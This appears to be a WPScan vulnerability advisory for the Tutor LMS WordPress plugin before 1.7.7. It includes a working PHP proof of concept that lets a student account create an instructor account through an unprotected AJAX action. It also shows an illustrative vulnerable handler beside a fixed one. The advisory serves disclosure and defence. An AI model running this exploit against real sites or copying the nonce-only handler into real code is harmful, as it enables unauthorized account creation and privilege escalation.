wpvulndb | Chloe Chamberland | WPVDB-ID: 5E85917C-7A58-49CB-B8B3-05AA18FFFF3E
Published: Mar 15, 2021

Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Source: wpscan.com

EPSS: 0.001 (Low), percentile 44.8%

Several AJAX endpoints in the plugin were unprotected: a logged-in student could call them to modify course information, elevate their privileges (the PoC below creates an instructor account from a student session) and perform many other actions. Fixed in version 1.7.7.

PoC

Only one PoC is provided, for the privilege escalation. The published copy is truncated before the login request, so the target URL, student credentials and cookie jar are filled in here as placeholders; the smart quotes from the page have been repaired and the nonce regex loosened so it no longer depends on the exact confirm-text string.

```php
<?php
// Privilege-escalation PoC: a logged-in student creates an instructor account
// through the unprotected `tutor_add_instructor` AJAX action.

// Placeholders (the original PoC defined these above the point where the
// published copy is cut off).
$wp_url    = 'http://target.example';   // WordPress site running Tutor LMS < 1.7.7
$wp_user   = 'student';                 // any low-privilege (student) account
$wp_pass   = 'student-password';
$cookiejar = tempnam(sys_get_temp_dir(), 'tutor_poc_');

// Log in as the student; the session cookies are kept in the cookie jar.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce. The plugin prints `var tutor_data = {..., "_wpnonce":"..."}`
// into the dashboard page served to the student, so the nonce is readable
// from the student's own session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

// Loosened from the original pattern, which also matched the
// delete_confirm_text that precedes the nonce.
if (!preg_match('/var\s+tutor_data\s*=\s*\{.*?"_wpnonce":"([^"]+)"/s', $content, $matches)) {
    fwrite(STDERR, "tutor_data nonce not found; check the login and the target URL\n");
    exit(1);
}
$nonce = $matches[1];
print_r($nonce);

// Update Settings: call tutor_add_instructor with the student's nonce. The
// endpoint accepts the request without checking the caller's capability and
// creates a new instructor account with the chosen password.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'first_name'            => 'Instructor',
    'last_name'             => 'Instructor',
    'user_login'            => 'Instructor',
    'email'                 => '[email protected]', // address redacted in the published PoC; use any valid address
    'phone_number'          => '1234567890',
    'password'              => 'test',
    'password_confirmation' => 'test',
    'tutor_profile_bio'     => '',
    'action'                => 'tutor_add_instructor',
    '_wpnonce'              => $nonce,
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
```
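What "unprotected" means here, and how such a handler is fixed, as an added illustration that is not Tutor LMS code: a hypothetical WordPress plugin AJAX action that creates an instructor account, once guarded only by a nonce (the situation the PoC exploits, since the student's dashboard hands out a valid nonce) and once with the capability check that closes the hole. The action names `example_add_instructor_v1` / `example_add_instructor`, the nonce action `example_instructor_nonce`, the capability `create_users` and the role `instructor` are assumptions chosen for the example.

```php
<?php
// Added example (not Tutor LMS code). Two versions of a hypothetical WordPress
// AJAX handler that creates an instructor account. Action names, the nonce
// action 'example_instructor_nonce' and the role 'instructor' are assumptions.

// The nonce reaches the browser the way tutor_data does in the PoC: printed
// into the admin page for every logged-in user. It is a CSRF token that binds
// the request to the current session; it says nothing about that user's role.
add_action('admin_enqueue_scripts', function () {
    wp_enqueue_script('example-admin', plugins_url('admin.js', __FILE__), [], '1.0', true);
    wp_localize_script('example-admin', 'example_data', [
        '_wpnonce' => wp_create_nonce('example_instructor_nonce'),
    ]);
});

// Shared input handling: sanitize, validate, then create the account.
function example_insert_instructor_from_request() {
    $post     = wp_unslash($_POST);
    $login    = sanitize_user($post['user_login'] ?? '', true);
    $email    = sanitize_email($post['email'] ?? '');
    $password = (string) ($post['password'] ?? '');
    $confirm  = (string) ($post['password_confirmation'] ?? '');

    if ($login === '' || !is_email($email)) {
        wp_send_json_error(['message' => 'Invalid login or email'], 400);
    }
    if ($password === '' || $password !== $confirm) {
        wp_send_json_error(['message' => 'Passwords do not match'], 400);
    }

    $user_id = wp_insert_user([
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $password,
        'first_name' => sanitize_text_field($post['first_name'] ?? ''),
        'last_name'  => sanitize_text_field($post['last_name'] ?? ''),
        'description'=> sanitize_textarea_field($post['tutor_profile_bio'] ?? ''),
        'role'       => 'instructor',
    ]);
    if (is_wp_error($user_id)) {
        wp_send_json_error(['message' => $user_id->get_error_message()], 400);
    }
    wp_send_json_success(['user_id' => $user_id]);
}

// VULNERABLE: the nonce is verified, the caller's capability is not. Any
// logged-in user holding a valid nonce (a student, per the PoC) creates an
// instructor. wp_ajax_ without _nopriv_ only keeps anonymous callers out.
add_action('wp_ajax_example_add_instructor_v1', function () {
    check_ajax_referer('example_instructor_nonce', '_wpnonce');
    example_insert_instructor_from_request();
});

// FIXED: same handler, gated on a capability before anything changes. The
// nonce still prevents CSRF; current_user_can() is what separates a student
// from an administrator. wp_send_json_error() exits, so nothing runs past it.
add_action('wp_ajax_example_add_instructor', function () {
    check_ajax_referer('example_instructor_nonce', '_wpnonce');
    if (!current_user_can('create_users')) {
        wp_send_json_error(['message' => 'Insufficient privileges'], 403);
    }
    example_insert_instructor_from_request();
});
```

When auditing a plugin for this class of bug, look at every `wp_ajax_*` and `wp_ajax_nopriv_*` registration and check that the handler calls `current_user_can()` (or an equivalent ownership check) in addition to `check_ajax_referer()`; a nonce alone, as the PoC shows, is obtainable by the lowest-privilege user the plugin serves.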

CPE
Name   Operator  Version
tutor  lt        1.7.7

